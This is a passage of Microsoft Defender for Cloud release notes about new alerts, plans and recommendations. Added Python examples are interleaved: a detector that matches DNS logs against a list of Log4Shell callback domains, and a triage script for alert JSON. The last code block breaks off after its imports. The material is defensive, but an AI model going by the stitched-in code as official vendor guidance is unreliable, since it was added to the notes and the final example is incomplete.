- Microsoft Defender for Servers brings threat detection and advanced defenses to your compute instances in AWS and GCP. The Defender for Servers plan includes an integrated license for Microsoft Defender for Endpoint, vulnerability assessment scanning, and more. Learn about all of the supported features for virtual machines and servers. Automatic onboarding capabilities allow you to easily connect any existing or new compute instances discovered in your environment.

Learn how to protect and connect your AWS environment and GCP organization with Microsoft Defender for Cloud.


Registry scan for Windows images in ACR added support for national clouds

Registry scan for Windows images is now supported in Azure Government and Microsoft Azure operated by 21Vianet. This addition is currently in preview.

Learn more about our feature's availability.


February 2022

Updates in February include:

- Kubernetes workload protection for Arc-enabled Kubernetes clusters
- Native CSPM for GCP and threat protection for GCP compute instances
- Microsoft Defender for Azure Cosmos DB plan released for preview
- Threat protection for Google Kubernetes Engine (GKE) clusters


Kubernetes workload protection for Arc-enabled Kubernetes clusters

Defender for Containers previously only protected Kubernetes workloads running in Azure Kubernetes Service. We've now extended the protective coverage to include Azure Arc-enabled Kubernetes clusters.

Learn how to set up your Kubernetes workload protection for AKS and Azure Arc-enabled Kubernetes clusters.

Native CSPM for GCP and threat protection for GCP compute instances

The new automated onboarding of GCP environments allows you to protect GCP workloads with Microsoft Defender for Cloud. Defender for Cloud protects your resources with the following plans:

- Defender for Cloud's CSPM features extend to your GCP resources. This agentless plan assesses your GCP resources according to the GCP-specific security recommendations, which are provided with Defender for Cloud. GCP recommendations are included in your secure score, and the resources will be assessed for compliance with the built-in GCP CIS standard. Defender for Cloud's asset inventory page is a multicloud enabled feature helping you manage your resources across Azure, AWS, and GCP.

- Microsoft Defender for Servers brings threat detection and advanced defenses to your GCP compute instances. This plan includes the integrated license for Microsoft Defender for Endpoint, vulnerability assessment scanning, and more.

For a full list of available features, see Supported features for virtual machines and servers. Automatic onboarding capabilities will allow you to easily connect any existing and new compute instances discovered in your environment.

Learn how to protect and connect your GCP projects with Microsoft Defender for Cloud.


Microsoft Defender for Azure Cosmos DB plan released for preview 


We have extended Microsoft Defender for Cloud's database coverage. You can now enable protection for your Azure Cosmos DB databases.

Microsoft Defender for Azure Cosmos DB is an Azure-native layer of security that detects attempts to exploit databases in your Azure Cosmos DB accounts. It detects potential SQL injections, known bad actors based on Microsoft Threat Intelligence, suspicious access patterns, and potential exploitation of your database through compromised identities or malicious insiders. It continuously analyzes the customer data stream generated by the Azure Cosmos DB services.

When potentially malicious activities are detected, security alerts are generated. These alerts are displayed in Microsoft Defender for Cloud together with the details of the suspicious activity, the relevant investigation steps, remediation actions, and security recommendations.

There's no impact on database performance when enabling the service, because Defender for Azure Cosmos DB doesn't access the Azure Cosmos DB account data.

Learn more at Overview of Microsoft Defender for Azure Cosmos DB.

We're also introducing a new enablement experience for database security. You can now enable Microsoft Defender for Cloud protection on your subscription to protect all database types (Azure Cosmos DB, Azure SQL Database, SQL servers on machines, and open-source relational databases) through one enablement process. Specific resource types can be included or excluded by configuring your plan.

Learn how to enable your database security at the subscription level.


Threat protection for Google Kubernetes Engine (GKE) clusters 


Following our recent announcement Native CSPM for GCP and threat protection for GCP compute instances, Microsoft Defender for Containers has extended its Kubernetes threat protection, behavioral analytics, and built-in admission control policies to Google Kubernetes Engine (GKE) Standard clusters. You can easily onboard any existing or new GKE Standard clusters to your environment through our automatic onboarding capabilities. Check out Container security with Microsoft Defender for Cloud for a full list of available features.


January 2022

Updates in January include:

- Microsoft Defender for Resource Manager updated with new alerts and greater emphasis on high-risk operations mapped to MITRE ATT&CK® Matrix
- Recommendations to enable Microsoft Defender plans on workspaces (in preview)
- Auto provision Log Analytics agent to Azure Arc-enabled machines (preview)
- Deprecated the recommendation to classify sensitive data in SQL databases
- Communication with suspicious domain alert expanded to include known Log4Shell-related domains
- 'Copy alert JSON' button added to security alert details pane
- Renamed two recommendations
- Deprecate Kubernetes cluster containers should only listen on allowed ports policy
- Added 'Active Alerts' workbook
- 'System update' recommendation added to government cloud


Microsoft Defender for Resource Manager updated with new alerts 
and greater emphasis on high-risk operations mapped to MITRE 
ATT&CK® Matrix 


The cloud management layer is a crucial service connected to all your cloud resources. Because of this, it's also a potential target for attackers. We recommend that security operations teams closely monitor the resource management layer.

Microsoft Defender for Resource Manager automatically monitors the resource management operations in your organization, whether they're performed through the Azure portal, Azure REST APIs, Azure CLI, or other Azure programmatic clients. Defender for Cloud runs advanced security analytics to detect threats and alerts you about suspicious activity.

The plan's protections greatly enhance an organization's resiliency against attacks from threat actors and significantly increase the number of Azure resources protected by Defender for Cloud.

In December 2020, we introduced the preview of Defender for Resource Manager, and in May 2021 the plan was released for general availability.

With this update, we've comprehensively revised the focus of the Microsoft Defender for Resource Manager plan. The updated plan includes many new alerts focused on identifying suspicious invocation of high-risk operations. These new alerts provide extensive monitoring for attacks across the complete MITRE ATT&CK® matrix for cloud-based techniques.

This matrix covers the following range of potential intentions of threat actors who may be targeting your organization's resources: Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Exfiltration, and Impact.

The new alerts for this Defender plan cover these intentions as shown in the following table.

Tip: These alerts also appear in the alerts reference page.
Alert: Suspicious invocation of a high-risk 'Initial Access' operation detected (Preview) (ARM_AnomalousOperation.InitialAccess)
Description: Microsoft Defender for Resource Manager identified a suspicious invocation of a high-risk operation in your subscription, which might indicate an attempt to access restricted resources. The identified operations are designed to allow administrators to efficiently access their environments. While this activity may be legitimate, a threat actor might utilize such operations to gain initial access to restricted resources in your environment. This can indicate that the account is compromised and is being used with malicious intent.
MITRE tactic (intention): Initial Access
Severity: Medium

Alert: Suspicious invocation of a high-risk 'Execution' operation detected (Preview) (ARM_AnomalousOperation.Execution)
Description: Microsoft Defender for Resource Manager identified a suspicious invocation of a high-risk operation on a machine in your subscription, which might indicate an attempt to execute code. The identified operations are designed to allow administrators to efficiently manage their environments. While this activity may be legitimate, a threat actor might utilize such operations to access restricted credentials and compromise resources in your environment. This can indicate that the account is compromised and is being used with malicious intent.
MITRE tactic (intention): Execution
Severity: Medium

Alert: Suspicious invocation of a high-risk 'Persistence' operation detected (Preview) (ARM_AnomalousOperation.Persistence)
Description: Microsoft Defender for Resource Manager identified a suspicious invocation of a high-risk operation in your subscription, which might indicate an attempt to establish persistence. The identified operations are designed to allow administrators to efficiently manage their environments. While this activity may be legitimate, a threat actor might utilize such operations to establish persistence in your environment. This can indicate that the account is compromised and is being used with malicious intent.
MITRE tactic (intention): Persistence
Severity: Medium

Alert: Suspicious invocation of a high-risk 'Privilege Escalation' operation detected (Preview) (ARM_AnomalousOperation.PrivilegeEscalation)
Description: Microsoft Defender for Resource Manager identified a suspicious invocation of a high-risk operation in your subscription, which might indicate an attempt to escalate privileges. The identified operations are designed to allow administrators to efficiently manage their environments. While this activity may be legitimate, a threat actor might utilize such operations to escalate privileges while compromising resources in your environment. This can indicate that the account is compromised and is being used with malicious intent.
MITRE tactic (intention): Privilege Escalation
Severity: Medium

Alert: Suspicious invocation of a high-risk 'Defense Evasion' operation detected (Preview) (ARM_AnomalousOperation.DefenseEvasion)
Description: Microsoft Defender for Resource Manager identified a suspicious invocation of a high-risk operation in your subscription, which might indicate an attempt to evade defenses. The identified operations are designed to allow administrators to efficiently manage the security posture of their environments. While this activity may be legitimate, a threat actor might utilize such operations to avoid being detected while compromising resources in your environment. This can indicate that the account is compromised and is being used with malicious intent.
MITRE tactic (intention): Defense Evasion
Severity: Medium

Alert: Suspicious invocation of a high-risk 'Credential Access' operation detected (Preview) (ARM_AnomalousOperation.CredentialAccess)
Description: Microsoft Defender for Resource Manager identified a suspicious invocation of a high-risk operation in your subscription, which might indicate an attempt to access credentials. The identified operations are designed to allow administrators to efficiently access their environments. While this activity may be legitimate, a threat actor might utilize such operations to access restricted credentials and compromise resources in your environment. This can indicate that the account is compromised and is being used with malicious intent.
MITRE tactic (intention): Credential Access
Severity: Medium

Alert: Suspicious invocation of a high-risk 'Lateral Movement' operation detected (Preview) (ARM_AnomalousOperation.LateralMovement)
Description: Microsoft Defender for Resource Manager identified a suspicious invocation of a high-risk operation in your subscription, which might indicate an attempt to perform lateral movement. The identified operations are designed to allow administrators to efficiently manage their environments. While this activity may be legitimate, a threat actor might utilize such operations to compromise additional resources in your environment. This can indicate that the account is compromised and is being used with malicious intent.
MITRE tactic (intention): Lateral Movement
Severity: Medium

Alert: Suspicious invocation of a high-risk 'Data Collection' operation detected (Preview) (ARM_AnomalousOperation.Collection)
Description: Microsoft Defender for Resource Manager identified a suspicious invocation of a high-risk operation in your subscription, which might indicate an attempt to collect data. The identified operations are designed to allow administrators to efficiently manage their environments. While this activity may be legitimate, a threat actor might utilize such operations to collect sensitive data on resources in your environment. This can indicate that the account is compromised and is being used with malicious intent.
MITRE tactic (intention): Collection
Severity: Medium

Alert: Suspicious invocation of a high-risk 'Impact' operation detected (Preview) (ARM_AnomalousOperation.Impact)
Description: Microsoft Defender for Resource Manager identified a suspicious invocation of a high-risk operation in your subscription, which might indicate an attempted configuration change. The identified operations are designed to allow administrators to efficiently manage their environments. While this activity may be legitimate, a threat actor might utilize such operations to access restricted credentials and compromise resources in your environment. This can indicate that the account is compromised and is being used with malicious intent.
MITRE tactic (intention): Impact
Severity: Medium

In addition, these two alerts from this plan have come out of preview:

Alert: Azure Resource Manager operation from suspicious IP address (ARM_OperationFromSuspiciousIP)
Description: Microsoft Defender for Resource Manager detected an operation from an IP address that has been marked as suspicious in threat intelligence feeds.
MITRE tactic (intention): Execution
Severity: Medium

Alert: Azure Resource Manager operation from suspicious proxy IP address (ARM_OperationFromSuspiciousProxyIP)
Description: Microsoft Defender for Resource Manager detected a resource management operation from an IP address that is associated with proxy services, such as TOR. While this behavior can be legitimate, it's often seen in malicious activities, when threat actors try to hide their source IP.
MITRE tactic (intention): Defense Evasion
Severity: Medium

Recommendations to enable Microsoft Defender plans on workspaces (in preview)

To benefit from all of the security features available from Microsoft Defender for Servers and Microsoft Defender for SQL on machines, the plans must be enabled on both the subscription and workspace levels.

When a machine is in a subscription with one of these plans enabled, you'll be billed for the full protections. However, if that machine is reporting to a workspace without the plan enabled, you won't actually receive those benefits.

We've added two recommendations that highlight workspaces without these plans enabled that nevertheless have machines reporting to them from subscriptions that do have the plan enabled.

The two recommendations, which both offer automated remediation (the 'Fix' action), are:

Recommendation: Microsoft Defender for Servers should be enabled on workspaces
Description: Microsoft Defender for Servers brings threat detection and advanced defenses for your Windows and Linux machines. With this Defender plan enabled on your subscriptions but not on your workspaces, you're paying for the full capability of Microsoft Defender for Servers but missing out on some of the benefits. When you enable Microsoft Defender for Servers on a workspace, all machines reporting to that workspace will be billed for Microsoft Defender for Servers - even if they're in subscriptions without Defender plans enabled. Unless you also enable Microsoft Defender for Servers on the subscription, those machines won't be able to take advantage of just-in-time VM access, adaptive application controls, and network detections for Azure resources. Learn more in Overview of Microsoft Defender for Servers. (No related policy)
Severity: Medium

Recommendation: Microsoft Defender for SQL on machines should be enabled on workspaces
Description: Microsoft Defender for SQL on machines brings threat detection and advanced defenses for SQL servers running on your Windows and Linux machines. With this Defender plan enabled on your subscriptions but not on your workspaces, you're paying for the full capability of the plan but missing out on some of the benefits. When you enable Microsoft Defender for SQL on machines on a workspace, all machines reporting to that workspace will be billed for the plan - even if they're in subscriptions without Defender plans enabled. Unless you also enable the plan on the subscription, those machines won't receive the full set of protections. (No related policy)
Severity: Medium
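The subscription-versus-workspace rule above is easy to get wrong once dozens of workspaces are involved, so it is worth checking programmatically. The following Python is an added example (it is not part of these release notes and not a Microsoft tool) that applies that rule to a constructed inventory. The subscription and workspace names, the plan name and the machine-to-workspace mapping are hypothetical; in practice the subscription tier comes from the subscription's Defender pricing settings, the workspace side from the security solution installed on the workspace, and the mapping from the agent's configuration.

```python
"""Reconcile Defender for Servers (or Defender for SQL on machines) enablement
between subscriptions and Log Analytics workspaces.

Added example with a constructed inventory; nothing here queries Azure.
"""

from dataclasses import dataclass


@dataclass(frozen=True)
class Machine:
    name: str
    subscription: str   # subscription the machine lives in (billing side)
    workspace: str      # workspace the Log Analytics agent reports to (feature side)


# Constructed, hypothetical inventory.
SUBSCRIPTIONS_WITH_PLAN = {"sub-prod"}     # plan enabled at subscription level
WORKSPACES_WITH_PLAN = {"law-shared"}      # plan enabled at workspace level
MACHINES = [
    Machine("web-01", "sub-prod", "law-shared"),   # both levels: full protection
    Machine("web-02", "sub-prod", "law-legacy"),   # billed, but workspace lacks the plan
    Machine("dev-01", "sub-dev", "law-shared"),    # billed via workspace, subscription lacks plan
    Machine("dev-02", "sub-dev", "law-legacy"),    # neither level: not covered
]


def classify(machine, subs_with_plan, ws_with_plan):
    """Map one machine onto the four cases the release note describes."""
    sub_on = machine.subscription in subs_with_plan
    ws_on = machine.workspace in ws_with_plan
    if sub_on and ws_on:
        return "fully-protected"
    if sub_on:
        # Paying for the plan on the subscription, missing the workspace-side benefits.
        return "paying-without-workspace-benefits"
    if ws_on:
        # Workspace enablement bills this machine even though its subscription has no plan,
        # and subscription-only features (JIT access, adaptive controls, ...) are unavailable.
        return "billed-by-workspace-missing-subscription-features"
    return "not-covered"


def reconcile(machines, subs_with_plan, ws_with_plan):
    """Group machine names by the classification above."""
    report = {}
    for m in machines:
        report.setdefault(classify(m, subs_with_plan, ws_with_plan), []).append(m.name)
    return report


def workspaces_needing_plan(machines, subs_with_plan, ws_with_plan):
    """Workspaces the new recommendation would flag: plan not enabled, but at least one
    reporting machine belongs to a subscription where the plan is enabled."""
    return sorted({m.workspace for m in machines
                   if m.subscription in subs_with_plan and m.workspace not in ws_with_plan})


if __name__ == "__main__":
    for bucket, names in reconcile(MACHINES, SUBSCRIPTIONS_WITH_PLAN, WORKSPACES_WITH_PLAN).items():
        print(f"{bucket}: {', '.join(names)}")
    print("enable plan on workspaces:",
          workspaces_needing_plan(MACHINES, SUBSCRIPTIONS_WITH_PLAN, WORKSPACES_WITH_PLAN))
```

The `workspaces_needing_plan` result is the set the 'Fix' action would target; the `billed-by-workspace-missing-subscription-features` bucket is the cost surprise the recommendation text warns about, so review it before applying the fix to a shared workspace.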


Auto provision Log Analytics agent to Azure Arc-enabled machines 
(preview) 


Defender for Cloud uses the Log Analytics agent to gather security-related data from machines. The agent reads various security-related configurations and event logs and copies the data to your workspace for analysis.

Defender for Cloud's auto provisioning settings have a toggle for each type of supported extension, including the Log Analytics agent.

In a further expansion of our hybrid cloud features, we've added an option to auto provision the Log Analytics agent to machines connected to Azure Arc.

As with the other auto provisioning options, this is configured at the subscription level.

When you enable this option, you'll be prompted for the workspace.

Note: For this preview, you can't select the default workspace that was created by Defender for Cloud. To ensure you receive the full set of security features available for the Azure Arc-enabled servers, verify that you have the relevant security solution installed on the selected workspace.

[Screenshot: Settings > Auto provisioning, showing the "Log Analytics agent for Azure VMs" extension (On, 5 of 34 virtual machines missing the extension, with the selected workspace and "Security events: Common" configuration) and the new "Log Analytics agent for Azure Arc Machines (preview)" extension (Off, 23 of 27 Azure Arc machines missing the extension).]


Deprecated the recommendation to classify sensitive data in SQL databases

We've removed the recommendation Sensitive data in your SQL databases should be classified as part of an overhaul of how Defender for Cloud identifies and protects sensitive data in your cloud resources.

Advance notice of this change appeared for the last six months in the Important upcoming changes to Microsoft Defender for Cloud page.


Communication with suspicious domain alert expanded to include known Log4Shell-related domains

The following alert was previously only available to organizations that had enabled the Microsoft Defender for DNS plan.

With this update, the alert will also show for subscriptions with the Microsoft Defender for Servers or Defender for App Service plan enabled.

In addition, Microsoft Threat Intelligence has expanded the list of known malicious domains to include domains associated with exploiting the widely publicized vulnerabilities associated with Log4j.

Alert: Communication with suspicious domain identified by threat intelligence (AzureDNS_ThreatIntelSuspectDomain)
Description: Communication with a suspicious domain was detected by analyzing DNS transactions from your resource and comparing against known malicious domains identified by threat intelligence feeds. Communication to malicious domains is frequently performed by attackers and could imply that your resource is compromised.
MITRE tactics: Initial Access / Persistence / Execution / Command And Control / Exploitation
Severity: Medium
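The alert above is, at its core, DNS query names compared against a threat-intelligence list. The following Python is an added example of that detection logic run over sample log lines; it is not Defender for Cloud's own detection code and not part of these release notes. The threat-intelligence entries and the DNS log lines are constructed, use reserved example TLDs, and are not real Log4Shell infrastructure. The two details worth getting right are shown: DNS names are case-insensitive with an optional trailing dot, and a JNDI callback from an exploited host typically resolves an attacker-chosen subdomain, so matching must walk up the parent domains rather than compare whole strings (while not matching a mere prefix like notldap-callback.example).

```python
"""Threat-intelligence domain matching over DNS query logs.

Added example with constructed data; not Defender's implementation.
"""

from collections import defaultdict

# Constructed TI feed: domains seen serving JNDI/LDAP callbacks (hypothetical, reserved TLDs).
SUSPICIOUS_DOMAINS = {
    "ldap-callback.example",
    "jndi.invalid",
}

# Constructed DNS query log: timestamp, resource name, query name, query type.
DNS_LOG = """\
2021-12-11T08:01:10Z vm-web-01 api.contoso.example A
2021-12-11T08:01:12Z vm-web-01 x1.ldap-callback.example A
2021-12-11T08:01:13Z vm-web-01 LDAP-CALLBACK.EXAMPLE. AAAA
2021-12-11T08:02:00Z vm-app-02 cdn.contoso.example A
2021-12-11T08:02:05Z vm-app-02 notldap-callback.example A
2021-12-11T08:03:30Z vm-app-02 a.b.jndi.invalid TXT
"""


def normalize(qname):
    """DNS names are case-insensitive; drop the trailing root dot."""
    return qname.rstrip(".").lower()


def matches_ti(qname, ti_domains):
    """Return the matching TI domain for the name or any of its parent domains.

    x1.ldap-callback.example matches ldap-callback.example (attacker subdomain),
    notldap-callback.example does not (label-aligned, not a string suffix)."""
    labels = normalize(qname).split(".")
    for i in range(len(labels)):
        candidate = ".".join(labels[i:])
        if candidate in ti_domains:
            return candidate
    return None


def parse_line(line):
    ts, resource, qname, qtype = line.split()
    return ts, resource, qname, qtype


def detect(log_text, ti_domains):
    """Raise one finding per resource (as the alert does), with the matched
    domains, first-seen time and number of matching queries."""
    findings = defaultdict(lambda: {"first_seen": None, "domains": set(), "queries": 0})
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, resource, qname, _qtype = parse_line(line)
        matched = matches_ti(qname, ti_domains)
        if matched is None:
            continue
        entry = findings[resource]
        entry["first_seen"] = entry["first_seen"] or ts
        entry["domains"].add(matched)
        entry["queries"] += 1
    return dict(findings)


if __name__ == "__main__":
    for resource, info in detect(DNS_LOG, SUSPICIOUS_DOMAINS).items():
        print(resource, info["first_seen"], sorted(info["domains"]), info["queries"])
```

In a real pipeline the TI set would be refreshed from your feed and the log read from your DNS analytics table; the matching and per-resource aggregation stay the same.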


‘Copy alert JSON' button added to security alert details pane 


To help our users quickly share an alert's details with others (for example, SOC analysts, resource owners, and developers), we've added the capability to extract all the details of a specific alert with one button from the security alert's details pane.

The new Copy alert JSON button puts the alert's details, in JSON format, into the user's clipboard.
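The JSON that button copies is also what a SOC would feed into tooling, and the Defender for Resource Manager table above shows why it helps to treat such alerts as stages of one chain rather than isolated events. The following Python is an added example (not part of these release notes and not Microsoft code) that triages pasted alert JSON: it keeps only Active alerts, scores each by severity and by how far along the MITRE ATT&CK kill chain its tactic sits, flags preview detections, and groups alerts per compromised entity in time order. The three sample alerts are constructed to follow the general shape of a Defender for Cloud alert resource (properties.alertType, severity, intent, status, compromisedEntity, startTimeUtc) using alert types named on this page; treating intent as a comma-separated list and the exact field names are assumptions.

```python
"""Triage of Defender for Cloud alert JSON (added example, constructed data)."""

import json

# Kill-chain order from the tactics the Resource Manager plan maps to; later stages
# score higher because they mean the attacker is further along.
TACTIC_ORDER = ["InitialAccess", "Execution", "Persistence", "PrivilegeEscalation",
                "DefenseEvasion", "CredentialAccess", "Discovery", "LateralMovement",
                "Collection", "Exfiltration", "Impact"]
SEVERITY_WEIGHT = {"Low": 1, "Medium": 2, "High": 3}

# Constructed sample of three pasted alerts (field names are assumptions).
SAMPLE_ALERTS_JSON = json.dumps([
    {"name": "a1", "properties": {
        "alertType": "ARM_AnomalousOperation.PrivilegeEscalation",
        "alertDisplayName": "Suspicious invocation of a high-risk 'Privilege Escalation' operation detected (Preview)",
        "severity": "Medium", "intent": "PrivilegeEscalation", "status": "Active",
        "compromisedEntity": "sub-prod", "startTimeUtc": "2022-01-10T10:02:00Z"}},
    {"name": "a2", "properties": {
        "alertType": "ARM_OperationFromSuspiciousProxyIP",
        "alertDisplayName": "Azure Resource Manager operation from suspicious proxy IP address",
        "severity": "Medium", "intent": "DefenseEvasion", "status": "Active",
        "compromisedEntity": "sub-prod", "startTimeUtc": "2022-01-10T10:00:00Z"}},
    {"name": "a3", "properties": {
        "alertType": "Storage.Blob_SuspiciousApp",
        "alertDisplayName": "PREVIEW - Access from a suspicious application",
        "severity": "Medium", "intent": "InitialAccess", "status": "Dismissed",
        "compromisedEntity": "stcontoso01", "startTimeUtc": "2022-01-09T23:30:00Z"}},
])


def tactics(alert):
    """Assumption: 'intent' may carry several comma-separated tactics."""
    return [t.strip() for t in alert["properties"].get("intent", "").split(",") if t.strip()]


def score(alert):
    """Severity dominates; kill-chain stage breaks ties among equal severities."""
    p = alert["properties"]
    stage = max((TACTIC_ORDER.index(t) for t in tactics(alert) if t in TACTIC_ORDER), default=-1)
    return SEVERITY_WEIGHT.get(p.get("severity"), 0) * 100 + stage


def is_preview(alert):
    return "preview" in alert["properties"].get("alertDisplayName", "").lower()


def triage(alerts_json):
    """Active alerts only, highest score first; preview detections are kept but flagged
    because their logic may still change before general availability."""
    alerts = json.loads(alerts_json)
    active = [a for a in alerts if a["properties"].get("status") == "Active"]
    return [{"id": a["name"], "type": a["properties"]["alertType"],
             "entity": a["properties"].get("compromisedEntity"),
             "score": score(a), "preview": is_preview(a)}
            for a in sorted(active, key=score, reverse=True)]


def chain_by_entity(alerts_json):
    """Active alert types per compromised entity in time order: two Resource Manager
    alerts on one subscription read as one intrusion, not two unrelated events."""
    alerts = json.loads(alerts_json)
    chains = {}
    for a in sorted(alerts, key=lambda x: x["properties"].get("startTimeUtc", "")):
        if a["properties"].get("status") != "Active":
            continue
        chains.setdefault(a["properties"].get("compromisedEntity"), []).append(
            a["properties"]["alertType"])
    return chains


if __name__ == "__main__":
    for row in triage(SAMPLE_ALERTS_JSON):
        print(row)
    print(chain_by_entity(SAMPLE_ALERTS_JSON))
```

With the sample, the proxy-IP alert and the privilege-escalation alert on sub-prod come out as one ordered chain (evasion first, then escalation two minutes later), which is the reading an analyst wants before deciding whether the account is compromised.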
[Screenshot: the details pane of the sample alert "Attempted logon by a potentially harmful application" (severity High, status Active, activity time 11/28/21 11:51 AM UTC), with the new Copy alert JSON button next to the alert description: "THIS IS A SAMPLE ALERT: A potentially harmful application attempted to access SQL server 'Sample-SQL'." Affected resource: Sample-DB, subscription Playground, MITRE ATT&CK tactics: Pre-attack.]

Renamed two recommendations


For consistency with other recommendation names, we've renamed the following two recommendations:

- Recommendation to resolve vulnerabilities discovered in running container images
  - Previous name: Vulnerabilities in running container images should be remediated (powered by Qualys)
  - New name: Running container images should have vulnerability findings resolved

- Recommendation to enable diagnostic logs for Azure App Service
  - Previous name: Diagnostic logs should be enabled in App Service
  - New name: Diagnostic logs in App Service should be enabled


Deprecate Kubernetes cluster containers should only listen on allowed ports policy

We've deprecated the Kubernetes cluster containers should only listen on allowed ports recommendation.

Policy name: Kubernetes cluster containers should only listen on allowed ports
Description: Restrict containers to listen only on allowed ports to secure access to the Kubernetes cluster. This policy is generally available for Kubernetes Service (AKS), and preview for AKS Engine and Azure Arc enabled Kubernetes. For more information, see https://aka.ms/kubepolicydoc.
Effect(s): audit, deny, disabled
Version: 6.1.24

The Services should listen on allowed ports only recommendation should be used to limit the ports that an application exposes to the internet.


Added 'Active Alerts' workbook

To help our users understand the active threats to their environments and prioritize between active alerts during the remediation process, we've added the Active Alerts workbook.

[Screenshot: Microsoft Defender for Cloud > Workbooks > Gallery, showing the public workbook templates.]

The Active Alerts workbook allows users to view a unified dashboard of their aggregated alerts by severity, type, tag, MITRE ATT&CK tactics, and location. Learn more in Use the 'Active Alerts' workbook.


'System update' recommendation added to government cloud

The 'System updates should be installed on your machines' recommendation is now available on all government clouds.

It's likely that this change will impact your government cloud subscription's secure score. We expect the change to lead to a decreased score, but it's possible the recommendation's inclusion might result in an increased score in some cases.


December 2021

Updates in December include:

- Microsoft Defender for Containers plan released for general availability (GA)
- New alerts for Microsoft Defender for Storage released for general availability (GA)
- Improvements to alerts for Microsoft Defender for Storage
- 'PortSweeping' alert removed from network layer alerts


Microsoft Defender for Containers plan released for general
availability (GA)

Over two years ago, we introduced Defender for Kubernetes and Defender for container registries as
part of the Azure Defender offering within Microsoft Defender for Cloud.

With the release of Microsoft Defender for Containers, we've merged these two existing Defender
plans.

The new plan:

- Combines the features of the two existing plans - threat detection for Kubernetes clusters and
  vulnerability assessment for images stored in container registries
- Brings new and improved features - including multicloud support, host level threat detection
  with over sixty new Kubernetes-aware analytics, and vulnerability assessment for running images
- Introduces Kubernetes-native at-scale onboarding - by default, when you enable the plan all
  relevant components are configured to be deployed automatically

With this release, the availability and presentation of Defender for Kubernetes and Defender for
container registries has changed as follows:

- New subscriptions - The two previous container plans are no longer available
- Existing subscriptions - Wherever they appear in the Azure portal, the plans are shown as
  Deprecated with instructions for how to upgrade to the newer plan

[Screenshot: Defender plans page showing the Containers plan, with Kubernetes (deprecated) and
Container registries (deprecated) flagged "Update available"]

The new plan is free for the month of December 2021. For the potential changes to the billing from the
old plans to Defender for Containers, and for more information on the benefits introduced with this
plan, see Introducing Microsoft Defender for Containers.

For more information, see:

- Overview of Microsoft Defender for Containers
- Enable Microsoft Defender for Containers
- Introducing Microsoft Defender for Containers - Microsoft Tech Community
- Microsoft Defender for Containers | Defender for Cloud in the Field #3 - YouTube


New alerts for Microsoft Defender for Storage released for general
availability (GA)

Threat actors use tools and scripts to scan for publicly open containers in the hope of finding
misconfigured open storage containers with sensitive data.

Microsoft Defender for Storage detects these scanners so that you can block them and remediate your
posture.

The preview alert that detected this was called "Anonymous scan of public storage containers". To
provide greater clarity about the suspicious events discovered, we've divided this into two new alerts.

These alerts are relevant to Azure Blob Storage only.

We've improved the detection logic, updated the alert metadata, and changed the alert name and alert
type.

These are the new alerts:

- Alert: Publicly accessible storage containers successfully discovered
  Alert type: Storage.Blob_OpenContainersScanning.SuccessfulDiscovery
  Description: A successful discovery of publicly open storage container(s) in your storage account
  was performed in the last hour by a scanning script or tool. This usually indicates a
  reconnaissance attack, where the threat actor tries to list blobs by guessing container names, in
  the hope of finding misconfigured open storage containers with sensitive data in them. The threat
  actor may use their own script or use known scanning tools like Microburst to scan for publicly
  open containers.
  Applies to: Azure Blob Storage (not Azure Files or Azure Data Lake Storage Gen2)
  MITRE tactic: Collection
  Severity: Medium

- Alert: Publicly accessible storage containers unsuccessfully scanned
  Alert type: Storage.Blob_OpenContainersScanning.FailedAttempt
  Description: A series of failed attempts to scan for publicly open storage containers were
  performed in the last hour. This usually indicates a reconnaissance attack, where the threat actor
  tries to list blobs by guessing container names, in the hope of finding misconfigured open storage
  containers with sensitive data in them. The threat actor may use their own script or use known
  scanning tools like Microburst to scan for publicly open containers.
  Applies to: Azure Blob Storage (not Azure Files or Azure Data Lake Storage Gen2)
  MITRE tactic: Collection
  Severity: Low

For more information, see:

- Threat matrix for storage services
- Overview of Microsoft Defender for Storage
- List of alerts provided by Microsoft Defender for Storage


Improvements to alerts for Microsoft Defender for Storage

The initial access alerts now have improved accuracy and more data to support investigation.

Threat actors use various techniques in the initial access stage to gain a foothold within a network.
Two of the Microsoft Defender for Storage alerts that detect behavioral anomalies in this stage now
have improved detection logic and additional data to support investigations.

If you've configured automations or defined alert suppression rules for these alerts in the past, update
them in accordance with these changes.

Detecting access from a Tor exit node

Access from a Tor exit node might indicate a threat actor trying to hide their identity.

The alert is now tuned to generate only for authenticated access, which results in higher accuracy and
confidence that the activity is malicious. This enhancement reduces the benign positive rate.

An outlying pattern will have high severity, while less anomalous patterns will have medium severity.
The alert name and description have been updated. The AlertType remains unchanged.

- Alert name (old): Access from a Tor exit node to a storage account
- Alert name (new): Authenticated access from a Tor exit node
- Alert types: Storage.Blob_TorAnomaly / Storage.Files_TorAnomaly
- Description: One or more storage container(s) / file share(s) in your storage account were
  successfully accessed from an IP address known to be an active exit node of Tor (an anonymizing
  proxy). Threat actors use Tor to make it difficult to trace the activity back to them. Authenticated
  access from a Tor exit node is a likely indication that a threat actor is trying to hide their identity.
  Applies to: Azure Blob Storage, Azure Files, Azure Data Lake Storage Gen2
- MITRE tactic: Initial access
- Severity: High/Medium

Unusual unauthenticated access

A change in access patterns may indicate that a threat actor was able to exploit public read access to
storage containers, either by exploiting a mistake in access configurations, or by changing the access
permissions.

This medium severity alert is now tuned with improved behavioral logic, higher accuracy, and
confidence that the activity is malicious. This enhancement reduces the benign positive rate.

The alert name and description have been updated. The AlertType remains unchanged.

- Alert name (old): Anonymous access to a storage account
- Alert name (new): Unusual unauthenticated access to a storage container
- Alert types: Storage.Blob_AnonymousAccessAnomaly
- Description: This storage account was accessed without authentication, which is a change in the
  common access pattern. Read access to this container is usually authenticated. This might
  indicate that a threat actor was able to exploit public read access to storage container(s) in this
  storage account. Applies to: Azure Blob Storage
- MITRE tactic: Collection
- Severity: Medium

For more information, see:

- Threat matrix for storage services
- Introduction to Microsoft Defender for Storage
- List of alerts provided by Microsoft Defender for Storage
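The three detections described in this and the preceding section (open-container scanning split into successful and failed attempts, Tor access restricted to authenticated requests, and anonymous reads of a normally authenticated container) share one shape: group storage log records by source and decide on the pattern. The following is an added example, not Microsoft's detection code, that re-creates that logic in simplified form over a constructed log sample. The field names, the Tor exit list and the "normally authenticated" baseline are assumptions for the demo, not the real Azure Storage resource-log schema.

```python
# Added example, not Microsoft's detection code. It re-creates, in simplified form, the
# logic the Defender for Storage alerts above describe, run over constructed Azure
# Storage log records. Field names (time, operation, status, auth, ip, container) are
# assumptions for the demo, not the real resource-log schema.
from collections import defaultdict
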